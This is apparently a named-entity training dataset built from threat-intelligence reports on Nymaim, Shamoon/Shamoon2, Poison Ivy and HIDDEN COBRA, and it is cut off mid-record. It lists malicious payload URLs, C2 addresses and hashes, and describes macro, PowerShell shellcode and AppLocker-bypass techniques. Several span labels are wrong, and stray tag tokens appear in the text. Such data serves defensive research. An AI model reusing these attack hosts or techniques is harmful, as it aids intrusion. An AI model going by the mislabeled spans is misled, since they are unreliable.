"Pivoting off the five highlighted IP \u2019s above with a shared infrastructure , I pulled the reverse DNS to see what other sites may be present .", "spans": [{"start": 98, "end": 101, "label": "Indicator"}]} {"text": "The \u201c idXXXXX.top \u201d pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with \u201c ejX.com .", "spans": [{"start": 149, "end": 155, "label": "Malware"}, {"start": 194, "end": 201, "label": "Indicator"}]} {"text": "Given the level of overlap already , I proceeded to grab all of the passive DNS available for each of the 707 IP addresses .", "spans": [{"start": 76, "end": 79, "label": "Indicator"}]} {"text": "A full list of the domains can be 
seen here .", "spans": []} {"text": "From the first cluster on the left , if we sort by incoming links per node a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones .", "spans": [{"start": 160, "end": 166, "label": "Malware"}]} {"text": "A quick search with the AutoFocus transform to pull tag information shows these are specifically related to Nymaim , most likely for the DGA seed ; however , looking at domains with less links , other malware families begin to emerge .", "spans": [{"start": 108, "end": 114, "label": "Malware"}, {"start": 195, "end": 217, "label": "Malware"}]} {"text": "The cluster on the right is actually collapsing one collection of entities due to the sheer size of it .", "spans": []} {"text": "All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services \u2013 in this case \u201c online.verify.paypal \u201d ( 588 ) and \u201c hmrc.secure.refund \u201d ( 1021 ) .", "spans": []} {"text": "In addition to domains of that type , there is evidence of other malware distribution being carried out on this infrastructure .", "spans": []} {"text": "Collapsing the collection back down , note the two domains \u201c brontorittoozzo.com \u201d and \u201c randomessstioprottoy.net \u201d that fall outside of the collection due to more infrastructure connections .", "spans": [{"start": 61, "end": 80, "label": "Indicator"}, {"start": 89, "end": 113, "label": "Indicator"}]} {"text": "By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IP \u2019s and 2,611 domains being utilized for malicious activity .", "spans": []} {"text": "As such , these findings represent a collection of compromised websites , compromised registrar accounts used to spin up subdomains , domains used by malware DGA \u2019s , phishing kits , carding forums , malware C2 sites , and a slew of other domains that revolve around criminal 
activity .", "spans": [{"start": 158, "end": 161, "label": "Malware"}, {"start": 208, "end": 210, "label": "System"}]} {"text": "Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging , you can uncover a substantial amount of operationally useful indicators to protect you and yours .", "spans": []} {"text": "The Full Shamoon : How the Devastating Malware Was Inserted Into Networks", "spans": [{"start": 9, "end": 16, "label": "Malware"}]} {"text": ".", "spans": []} {"text": "Researchers from the IBM X-Force Incident Response and Intelligence Services ( IRIS ) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations .", "spans": [{"start": 21, "end": 90, "label": "Organization"}]} {"text": "These attacks , which occurred in November 2016 and January 2017 , reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states .", "spans": []} {"text": "Shamoon is designed to destroy computer hard drives by wiping the master boot record ( MBR ) and data irretrievably , unlike ransomware , which holds the data hostage for a fee .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "Through their recent investigations , our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures .", "spans": [{"start": 179, "end": 186, "label": "Malware"}]} {"text": "It \u2019s worth mentioning that , according to X-Force IRIS , the initial compromise took place weeks before the actual Shamoon deployment and activation were launched .", "spans": [{"start": 43, "end": 55, "label": "Organization"}, {"start": 116, "end": 123, "label": "Malware"}]} {"text": "Since Shamoon incidents feature the infiltration and 
escalation stages of targeted attacks , X-Force IRIS responders sought out the attackers \u2019 entry point .", "spans": [{"start": 93, "end": 116, "label": "System"}]} {"text": "Their findings pointed to what appears to be the initial point of compromise the attackers used : a document containing a malicious macro that , when approved to execute , enabled C2 communications to the attacker \u2019s server and remote shell via PowerShell .", "spans": [{"start": 180, "end": 182, "label": "Indicator"}, {"start": 245, "end": 255, "label": "System"}]} {"text": "The document was not the only one discovered in the recent attack waves .", "spans": []} {"text": "X-Force IRIS researchers had been tracking earlier activity associated with similar malicious , PowerShell-laden documents themed as resumes and human resources documents , some of which related to organizations in Saudi Arabia .", "spans": [{"start": 0, "end": 12, "label": "Organization"}]} {"text": "This research identified several bouts of offensive activity that occurred in the past few months , which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network .", "spans": []} {"text": "Although Shamoon was previously documented in research blogs , the specific network compromise methods leading to the attacks have remained unclear in the reported cases .", "spans": [{"start": 9, "end": 16, "label": "Malware"}]} {"text": "X-Force IRIS researchers studied Shamoon \u2019s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 33, "end": 40, "label": "Malware"}]} {"text": "This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold 
and subsequent operations :", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 138, "end": 148, "label": "System"}]} {"text": "Attackers send a spear phishing email to employees at the target organization .", "spans": [{"start": 32, "end": 37, "label": "System"}]} {"text": "The email contains a Microsoft Office document as an attachment .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 21, "end": 37, "label": "System"}]} {"text": "Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine .", "spans": [{"start": 32, "end": 37, "label": "System"}, {"start": 46, "end": 56, "label": "System"}]} {"text": "Attackers can now communicate with the compromised machine and remotely execute commands on it .", "spans": []} {"text": "The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network .", "spans": []} {"text": "Attackers study the network by connecting to additional systems and locating critical servers .", "spans": []} {"text": "The attackers deploy the Shamoon malware .", "spans": [{"start": 25, "end": 32, "label": "Malware"}]} {"text": "A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped .", "spans": [{"start": 14, "end": 21, "label": "Malware"}]} {"text": "X-Force IRIS identified the below malicious document .", "spans": [{"start": 0, "end": 12, "label": "Organization"}]} {"text": "X-Force IRIS File name : cv_itworx.doc .", "spans": [{"start": 25, "end": 38, "label": "Indicator"}]} {"text": "X-Force IRIS MD5 : 45b0e5a457222455384713905f886bd4 .", "spans": [{"start": 19, "end": 51, "label": "Indicator"}]} {"text": "X-Force IRIS SHA256 : 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62 .", "spans": [{"start": 22, "end": 86, "label": "Indicator"}]} {"text": "X-Force IRIS Hosting URL : http://mol.com-ho.me/cv_itworx.doc .", "spans": [{"start": 
27, "end": 61, "label": "Indicator"}]} {"text": "Our researchers examined the domain that hosted the first malicious file , mol.com-ho.me .", "spans": [{"start": 75, "end": 88, "label": "Indicator"}]} {"text": "Per the domain \u2019s WHOIS record , an anonymized registrant registered com-ho.me in October 2016 and used it to serve malicious documents with similar macro activation features .", "spans": [{"start": 18, "end": 23, "label": "Indicator"}, {"start": 69, "end": 78, "label": "Indicator"}]} {"text": "The following list of documents included :", "spans": []} {"text": "cv.doc : f4d18316e367a80e1005f38445421b1f . cv_itworx.doc : 45b0e5a457222455384713905f886bd4 . cv_mci.doc : f4d18316e367a80e1005f38445421b1f . discount_voucher_codes.xlsm : 19cea065aa033f5bcfa94a583ae59c08 .", "spans": [{"start": 0, "end": 6, "label": "Indicator"}, {"start": 9, "end": 41, "label": "Indicator"}, {"start": 44, "end": 57, "label": "Indicator"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 95, "end": 105, "label": "Indicator"}, {"start": 108, "end": 140, "label": "Indicator"}, {"start": 143, "end": 170, "label": "Indicator"}, {"start": 173, "end": 205, "label": "Indicator"}]} {"text": "Health_insurance_plan.doc : ecfc0275c7a73a9c7775130ebca45b74 .", "spans": [{"start": 0, "end": 25, "label": "Indicator"}, {"start": 28, "end": 60, "label": "Indicator"}]} {"text": "Health_insurance_registration.doc : 1b5e33e5a244d2d67d7a09c4ccf16e56 . job_titles.doc : fa72c068361c05da65bf2117db76aaa8 . job_titles_itworx.doc : 43fad2d62bc23ffdc6d301571135222c . 
job_titles_mci.doc : ce25f1597836c28cf415394fb350ae93 .", "spans": [{"start": 0, "end": 33, "label": "Indicator"}, {"start": 36, "end": 68, "label": "Indicator"}, {"start": 71, "end": 85, "label": "Indicator"}, {"start": 88, "end": 120, "label": "Indicator"}, {"start": 123, "end": 144, "label": "Indicator"}, {"start": 147, "end": 179, "label": "Indicator"}, {"start": 182, "end": 200, "label": "Indicator"}, {"start": 203, "end": 235, "label": "Indicator"}]} {"text": "Password_Policy.xlsm : 03ea9457bf71d51d8109e737158be888 .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 23, "end": 55, "label": "Indicator"}]} {"text": "These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload .", "spans": [{"start": 58, "end": 64, "label": "System"}]} {"text": "A closer review of the file names revealed \u201c IT Worx \u201d and \u201c MCI \u201d .", "spans": [{"start": 45, "end": 52, "label": "Organization"}, {"start": 61, "end": 64, "label": "Organization"}]} {"text": "A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt .", "spans": [{"start": 21, "end": 28, "label": "Organization"}, {"start": 41, "end": 91, "label": "Organization"}]} {"text": "MCI is Saudi Arabia \u2019s Ministry of Commerce and Investment .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 7, "end": 58, "label": "Organization"}]} {"text": "It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment .", "spans": [{"start": 55, "end": 61, "label": "System"}]} {"text": "X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern : briefl.ink/{a-z0-9}[5] .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 174, 
"end": 196, "label": "Indicator"}]} {"text": "File Detail : Info File name : job_titles_itworx.doc .", "spans": [{"start": 31, "end": 52, "label": "Indicator"}]} {"text": "MD5 : 43fad2d62bc23ffdc6d301571135222c .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}]} {"text": "SHA256 : e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "Hosting URL : http://briefl.ink/qhtma .", "spans": [{"start": 14, "end": 37, "label": "Indicator"}]} {"text": "Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure , identifying additional domains used by the threat actors .", "spans": [{"start": 8, "end": 11, "label": "Indicator"}, {"start": 67, "end": 74, "label": "Malware"}]} {"text": "Domain Name : Spoofed Site ntg-sa.com The domain ntg-sa.com appears to spoof the legit domain ntg.sa.com associated with the Namer Trading Group .", "spans": [{"start": 27, "end": 37, "label": "Indicator"}, {"start": 49, "end": 59, "label": "Indicator"}, {"start": 94, "end": 104, "label": "Indicator"}, {"start": 125, "end": 144, "label": "Organization"}]} {"text": "Per their webpage , NTG \u201c was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia \u201d . 
maps-modon.club : The maps-modon.club domain appears to spoof maps.modon.gov.sa , which is associated with the Saudi Industrial Property Authority , an organization \u201c responsible for the development of industrial cities with integrated infrastructure and services \u201d .", "spans": [{"start": 155, "end": 170, "label": "Indicator"}, {"start": 177, "end": 192, "label": "Indicator"}, {"start": 217, "end": 234, "label": "Indicator"}, {"start": 266, "end": 301, "label": "Organization"}]} {"text": "X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa.com .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 114, "end": 124, "label": "Indicator"}]} {"text": "This file duped targets into believing it was a Flash player installer that would drop a Windows batch to invoke PowerShell into the same C2 communications .", "spans": [{"start": 48, "end": 60, "label": "System"}, {"start": 89, "end": 96, "label": "System"}, {"start": 113, "end": 123, "label": "System"}, {"start": 138, "end": 140, "label": "Indicator"}]} {"text": "Analysis of one of the threat actor \u2019s documents found that if the macro executes , it launches two separate PowerShell Scripts .", "spans": [{"start": 109, "end": 119, "label": "System"}]} {"text": "The first one executes a PowerShell script served from http://139.59.46.154:3485/eiloShaegae1 .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 25, "end": 35, "label": "System"}, {"start": 55, "end": 93, "label": "Indicator"}]} {"text": "The host is possibly related to attacks that served the Pupy RAT , a publicly available cross-platform remote access tool .", "spans": [{"start": 56, "end": 64, "label": "System"}]} {"text": "The second script calls VirtualAlloc to create a buffer , uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread .", "spans": [{"start": 0, "end": 17, "label": "Malware"}]} 
{"text": "Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine .", "spans": [{"start": 0, "end": 10, "label": "System"}]} {"text": "The shellcode performs a DWORD XOR of 4 bytes at an offset from the beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times .", "spans": []} {"text": "If this execution is successful , it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from http://45.76.128.165:4443/0w0O6 .", "spans": [{"start": 157, "end": 188, "label": "Indicator"}]} {"text": "This is then returned as a string to PowerShell , which calls invoke-expression ( iex ) on it , indicating that the expected payload is PowerShell .", "spans": [{"start": 37, "end": 47, "label": "System"}, {"start": 136, "end": 146, "label": "System"}]} {"text": "Of note , the macro contained a DownloadFile() function that would use URLDownloadToFileA , but this was never actually used .", "spans": []} {"text": "Based on observations associated with the malicious document , we observed subsequent shell sessions probably associated with Metasploit B-MAL S-TOOL \u2019s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files : ntertmgr32.exe , ntertmgr64.exe and vdsk911.sys .", "spans": [{"start": 275, "end": 289, "label": "Indicator"}, {"start": 292, "end": 306, "label": "Indicator"}, {"start": 311, "end": 322, "label": "Indicator"}]} {"text": "Although the complete list of Shamoon \u2019s victims is not public , Bloomberg reported that in one case , thousands of computers were destroyed at the headquarters of Saudi \u2019s General Authority of Civil Aviation , erasing critical data and bringing operations to a halt for several days .", "spans": [{"start": 30, "end": 37, "label": "Malware"}, {"start": 164, "end": 208, "label": "Organization"}]} 
{"text": "The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves , but those are likely to subside following the public attention the cases have garnered since late 2016 .", "spans": [{"start": 20, "end": 32, "label": "Organization"}]} {"text": "Saudi Arabia released a warning to local organizations about the Shamoon malware , alerting about potential attacks and advising organizations to prepare .", "spans": [{"start": 65, "end": 72, "label": "Malware"}]} {"text": "Additional Insights on Shamoon2 .", "spans": [{"start": 23, "end": 31, "label": "Malware"}]} {"text": "IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 81, "end": 89, "label": "Malware"}]} {"text": "Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon .", "spans": [{"start": 159, "end": 166, "label": "Malware"}]} {"text": "Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign .", "spans": []} {"text": "While researching elements in the IBM report , ASERT discovered additional malicious domains , IP addresses , and artifacts .", "spans": [{"start": 34, "end": 37, "label": "Organization"}, {"start": 95, "end": 97, "label": "System"}]} {"text": "The basic functionality of the new documents and their PowerShell components matched what was previously disclosed .", "spans": [{"start": 55, "end": 65, "label": "System"}]} {"text": "For more information on the overall capabilities of the malware , please review IBM 's ongoing research .", "spans": [{"start": 80, "end": 83, "label": "Organization"}]} {"text": "It is our hope that by providing additional indicators , end-point investigators and network defenders will be 
able to discover and mitigate more Shamoon2 related compromises .", "spans": [{"start": 146, "end": 154, "label": "Malware"}]} {"text": "The following new samples were likely delivered via similar spear phishing campaigns as described in IBM 's research .", "spans": [{"start": 101, "end": 104, "label": "Organization"}]} {"text": "All three shared the same IPs and URLs , also provided below .", "spans": [{"start": 26, "end": 29, "label": "System"}, {"start": 34, "end": 38, "label": "System"}]} {"text": "These samples were located by pivoting on document attributes .", "spans": []} {"text": "In this case , a sample from the IBM report indicated the document author \u2018 gerry.knight \u2019 which led us to the following three additional samples . spear phishing : 2a0df97277ddb361cecf8726df6d78ac 5e5ea1a67c2538dbc01df28e4ea87472 d30b8468d16b631cafe458fd94cc3196 . spear phishing : 104.218.120.128 .", "spans": [{"start": 33, "end": 36, "label": "Organization"}, {"start": 165, "end": 197, "label": "Indicator"}, {"start": 198, "end": 230, "label": "Indicator"}, {"start": 231, "end": 263, "label": "Indicator"}, {"start": 283, "end": 298, "label": "Indicator"}]} {"text": "spear phishing : 69.87.223.26 .", "spans": [{"start": 17, "end": 29, "label": "Indicator"}]} {"text": "spear phishing : 5.254.100.200 .", "spans": [{"start": 17, "end": 30, "label": "Indicator"}]} {"text": "spear phishing : analytics-google.org : 69/checkFile.aspx .", "spans": [{"start": 17, "end": 57, "label": "Indicator"}]} {"text": "spear phishing : analytics-google.org .", "spans": [{"start": 17, "end": 37, "label": "Indicator"}]} {"text": "spear phishing : 69.87.223.26:8080/p .", "spans": [{"start": 17, "end": 36, "label": "Indicator"}]} {"text": "From the previous samples , we performed a passive DNS lookup on the IPs .", "spans": [{"start": 51, "end": 54, "label": "Indicator"}, {"start": 69, "end": 72, "label": "System"}]} {"text": "We found get.adobe.go-microstf.com hosted at 104.218.120.128 around 
the time this campaign was ongoing , November 2016 .", "spans": [{"start": 9, "end": 34, "label": "Indicator"}, {"start": 45, "end": 60, "label": "Indicator"}]} {"text": "Researching the domain go-microstf.com , hosted at 45.63.10.99 , revealed yet another iteration of malicious executables .", "spans": [{"start": 23, "end": 38, "label": "Indicator"}, {"start": 51, "end": 62, "label": "Indicator"}]} {"text": "In this case , a URL used to download the PowerShell component shared a naming convention found in the IBM report , http://69.87.223.26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples .", "spans": [{"start": 17, "end": 20, "label": "System"}, {"start": 42, "end": 52, "label": "System"}, {"start": 103, "end": 106, "label": "Organization"}, {"start": 116, "end": 153, "label": "Indicator"}]} {"text": "The following are IOCs related to this domain :", "spans": [{"start": 18, "end": 22, "label": "System"}]} {"text": "83be35956e5d409306a81e88a1dc89fd . 45.63.10.99 . 69.87.223.26 .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 35, "end": 46, "label": "Indicator"}, {"start": 49, "end": 61, "label": "Indicator"}]} {"text": "URLs go-microstf.com . 69.87.223.26:8080/eiloShaegae1 . 
go-microstf.com/checkfile.aspx .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 23, "end": 53, "label": "Indicator"}, {"start": 56, "end": 86, "label": "Indicator"}]} {"text": "The domain go-microstf.com was originally set up to spoof Google Analytics login page .", "spans": [{"start": 11, "end": 26, "label": "Indicator"}, {"start": 58, "end": 74, "label": "System"}]} {"text": "Finally , research yielded a relatively unique sample .", "spans": []} {"text": "This particular iteration was submitted to VirusTotal on September 16 , 2016 .", "spans": [{"start": 43, "end": 53, "label": "System"}]} {"text": "The majority of samples analyzed to date were submitted no earlier than mid-October , with most being submitted in January 2017 or later .", "spans": []} {"text": "We were able to discover this particular version by diving further into connections to analytics-google.org .", "spans": [{"start": 87, "end": 107, "label": "Indicator"}]} {"text": "Unlike newer samples , this one created a unique file sloo.exe .", "spans": [{"start": 54, "end": 62, "label": "Indicator"}]} {"text": "The file was created at C:\\Documents and Settings\\Admin\\Local Settings\\Temp\\sloo.exe .", "spans": [{"start": 62, "end": 84, "label": "Indicator"}]} {"text": "In addition to this file , the sample also contacted 104.238.184.252 for the PowerShell executable .", "spans": [{"start": 53, "end": 68, "label": "Indicator"}, {"start": 77, "end": 87, "label": "System"}]} {"text": "Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they \u2019ve named Magic Hound .", "spans": [{"start": 41, "end": 49, "label": "Indicator"}, {"start": 154, "end": 165, "label": "Organization"}]} {"text": "The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the two groups .", "spans": 
[{"start": 10, "end": 21, "label": "Organization"}, {"start": 68, "end": 81, "label": "Organization"}]} {"text": "Dell Secureworks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian PuppyRAT .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 75, "end": 78, "label": "Organization"}, {"start": 113, "end": 121, "label": "Organization"}]} {"text": "In addition , Dell analysts have assessed with high-confidence these activities are attributable to Iranian state-sponsored activities .", "spans": [{"start": 14, "end": 18, "label": "Organization"}]} {"text": "IOCs for this version were :", "spans": [{"start": 0, "end": 4, "label": "System"}]} {"text": "Shamoon2 : 07d6406036d6e06dc8019e3ade6ee7de .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]} {"text": "Shamoon2 : 104.238.184.252 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]} {"text": "Shamoon2 : 5.254.100.200 Shamoon2 : URLs .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 24, "label": "Indicator"}, {"start": 25, "end": 33, "label": "Malware"}, {"start": 36, "end": 40, "label": "System"}]} {"text": "Shamoon2 : analytics-google.org : 69/checkFile.aspx .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 51, "label": "Indicator"}]} {"text": "These additional IOCs will hopefully provide more context into the ongoing threat .", "spans": [{"start": 17, "end": 21, "label": "System"}]} {"text": "The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors .", "spans": [{"start": 74, "end": 82, "label": "Malware"}]} {"text": "The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems .", "spans": [{"start": 138, 
"end": 145, "label": "Malware"}, {"start": 149, "end": 154, "label": "System"}]} {"text": "Shamoon2 : 2a0df97277ddb361cecf8726df6d78ac .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]} {"text": "Shamoon2 : 5e5ea1a67c2538dbc01df28e4ea87472 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]} {"text": "Shamoon2 : d30b8468d16b631cafe458fd94cc3196 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]} {"text": "Shamoon2 : 83be35956e5d409306a81e88a1dc89fd .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]} {"text": "Shamoon2 : 07d6406036d6e06dc8019e3ade6ee7de .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]} {"text": "Shamoon2 : 104.218.120.128 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]} {"text": "Shamoon2 : 69.87.223.26 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 23, "label": "Indicator"}]} {"text": "Shamoon2 : 5.254.100.200 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 24, "label": "Indicator"}]} {"text": "Shamoon2 : 45.63.10.99 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 22, "label": "Indicator"}]} {"text": "Shamoon2 : 104.238.184.252 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]} {"text": "Shamoon2 : analytics-google.org : 69/checkFile.aspx .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 51, "label": "Indicator"}]} {"text": "Shamoon2 : analytics-google.org .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 31, "label": "Indicator"}]} {"text": "Shamoon2 : 69.87.223.26:8080/p .", "spans": [{"start": 0, "end": 8, 
"label": "Malware"}, {"start": 11, "end": 30, "label": "Indicator"}]} {"text": "Shamoon2 : go-microstf.com .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]} {"text": "Shamoon2 : 69.87.223.26:8080/eiloShaegae1 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 41, "label": "Indicator"}]} {"text": "Shamoon2 : get.adobe.go-microstf.com .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 36, "label": "Indicator"}]} {"text": "FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 84, "end": 104, "label": "Organization"}]} {"text": "Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy , a popular remote access tool ( RAT ) that has been used for nearly a decade for key logging , screen and video capture , file transfers , password theft , system administration , traffic relaying , and more .", "spans": [{"start": 34, "end": 79, "label": "Malware"}, {"start": 108, "end": 118, "label": "Malware"}, {"start": 131, "end": 149, "label": "System"}, {"start": 152, "end": 155, "label": "System"}]} {"text": "The threat actors behind this attack demonstrated some interesting techniques , including :", "spans": [{"start": 0, "end": 17, "label": "Organization"}]} {"text": "Customized evasion based on victim profile \u2013 The campaign used a publicly available technique to evade AppLocker application whitelisting applied to the targeted systems .", "spans": [{"start": 0, "end": 42, "label": "System"}]} {"text": "Fileless execution and persistence \u2013 In targeted campaigns , threat actors often attempt to avoid writing an executable to the disk to avoid detection and forensic examination .", "spans": [{"start": 0, "end": 34, "label": "System"}, {"start": 61, "end": 74, "label": 
"Organization"}]} {"text": "The campaign we observed used four stages of PowerShell scripts without writing the the payloads to individual files .", "spans": [{"start": 30, "end": 63, "label": "System"}]} {"text": "Decoy documents \u2013 This campaign used PowerShell to download benign documents from the Internet and launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity .", "spans": [{"start": 0, "end": 15, "label": "System"}, {"start": 37, "end": 47, "label": "System"}, {"start": 125, "end": 134, "label": "Organization"}]} {"text": "The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word document that launched a malicious PowerShell payload .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 23, "end": 41, "label": "System"}, {"start": 79, "end": 84, "label": "Malware"}, {"start": 90, "end": 113, "label": "System"}, {"start": 130, "end": 158, "label": "Malware"}]} {"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 62, "end": 91, "label": "System"}, {"start": 98, "end": 104, "label": "System"}, {"start": 134, "end": 146, "label": "Indicator"}]} {"text": "The malicious payload was spread across multiple PowerShell scripts , making its execution difficult to trace .", "spans": [{"start": 4, "end": 21, "label": "Malware"}, {"start": 40, "end": 67, "label": "System"}]} {"text": "Rather than being written to disk as individual script files , the PowerShell payloads were stored in the registry .", "spans": [{"start": 67, "end": 86, "label": "System"}, {"start": 106, "end": 114, "label": "System"}]} {"text": "Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for logging into webmail or information regarding a state law 
proposal .", "spans": [{"start": 33, "end": 57, "label": "System"}, {"start": 62, "end": 67, "label": "System"}, {"start": 122, "end": 129, "label": "System"}]} {"text": "Microsoft application whitelisting solution AppLocker prevents unknown executables from running on a system .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 10, "end": 43, "label": "System"}, {"start": 44, "end": 53, "label": "System"}]} {"text": "In April 2016 , a security researcher demonstrated a way to bypass this using regsvr32.exe , a legitimate Microsoft executable permitted to execute in many AppLocker policies .", "spans": [{"start": 78, "end": 90, "label": "Indicator"}, {"start": 95, "end": 126, "label": "System"}]} {"text": "The regsvr32.exe executable can be used to download a Windows Script Component file ( SCT file ) by passing the URL of the SCT file as an argument .", "spans": [{"start": 4, "end": 16, "label": "Indicator"}, {"start": 54, "end": 61, "label": "System"}, {"start": 62, "end": 78, "label": "System"}, {"start": 86, "end": 89, "label": "System"}]} {"text": "This technique bypasses AppLocker restrictions and permits the execution of code within the SCT file .", "spans": [{"start": 24, "end": 33, "label": "System"}]} {"text": "In the decrypted shellcode , we also observed content and configuration related to Poison Ivy .", "spans": []} {"text": "Correlating these bytes to the standard configuration of Poison Ivy , we can observe the following :", "spans": [{"start": 57, "end": 67, "label": "Vulnerability"}]} {"text": "Active setup : StubPath .", "spans": []} {"text": "Encryption/Decryption key : version2013 .", "spans": []} {"text": "Mutex name : 20160509 .", "spans": []} {"text": "Although Poison Ivy has been a proven threat for some time , the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns .", "spans": [{"start": 9, "end": 19, "label": "Vulnerability"}]} {"text": 
"Through the use of PowerShell and publicly available security control bypasses and scripts , most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host .", "spans": [{"start": 19, "end": 29, "label": "System"}, {"start": 34, "end": 90, "label": "System"}]} {"text": "FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 8, "end": 24, "label": "System"}, {"start": 30, "end": 53, "label": "System"}]} {"text": "It detects and blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage PowerShell payload .", "spans": [{"start": 135, "end": 145, "label": "System"}]} {"text": "Alert : HIDDEN COBRA - North Korea 's DDoS Botnet I-TOOL Infrastructure .", "spans": [{"start": 8, "end": 20, "label": "Organization"}, {"start": 38, "end": 42, "label": "System"}]} {"text": "This joint Technical Alert ( TA ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": [{"start": 80, "end": 111, "label": "Organization"}, {"start": 114, "end": 117, "label": "Organization"}, {"start": 128, "end": 159, "label": "Organization"}, {"start": 162, 